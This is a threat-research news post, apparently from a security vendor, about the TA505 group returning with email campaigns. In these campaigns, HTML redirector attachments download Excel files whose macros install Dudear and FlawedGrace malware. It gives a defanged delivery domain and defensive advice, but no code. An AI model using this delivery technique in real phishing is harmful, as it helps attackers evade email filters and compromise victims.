New Threat Research: MalSync Teardown: From DLL Hijacking to PHP Malware for Windows  

Read Threat Research

Search

TA505 Returns From Hiatus

TA505: Researchers from Microsoft have seen the threat group TA505 return from a short break of no activity. Since 2014, the financially motivated threat group has been notorious for spreading remote access trojans (RAT) to compromise retailers and large financial intuitions. The group has infected computers to drop trojans such as Tick and Dridex, as well as other common malware such as Locky, BitPaymer, Philadelphia, GlobeImposter and Jaff ransomware. In their newest campaign, the group used HTML redirectors attached to an email. When opened, the HTML file leads the victim to download an Excel file. The Excel file contains malicious macros that install Dudear malware. This campaign by the group shows how they have adapted and changed techniques in an attempt to evade detection. Past email campaigns to deliver Dudear would do so via an attachment or malicious URL. Sending an HTML file to automatically download the malicious document evades email threat scanners while making it easier for victims to fall prey to the malware by opening a seemingly harmless attachment. Different HTML files are being used in different languages so that these attackers are able to target victims all over the world. The malware also attempts to drop the FlawedGrace RAT after it has been executed. 

Analyst Notes

It is important for defenders to understand when threat groups change their tactics to try to evade detections, detection rules must be adapted. It is important to tune email threat filters to detect this type of threat coming from the outside. The HTML files used in this campaign included JavaScript using the “setTimeout” function to set the window location to a download URL hosted on the domain one-drive-storage[.]com. It is also important to have monitoring in place on the network and on endpoints to quickly find and stop intrusions before they spread. Indicators of Compromise (IOC) from Microsoft’s Twitter can be found here:


7150337


For more information: https://www.bleepingcomputer.com/news/security/microsoft-detects-new-ta505-malware-attacks-after-short-break/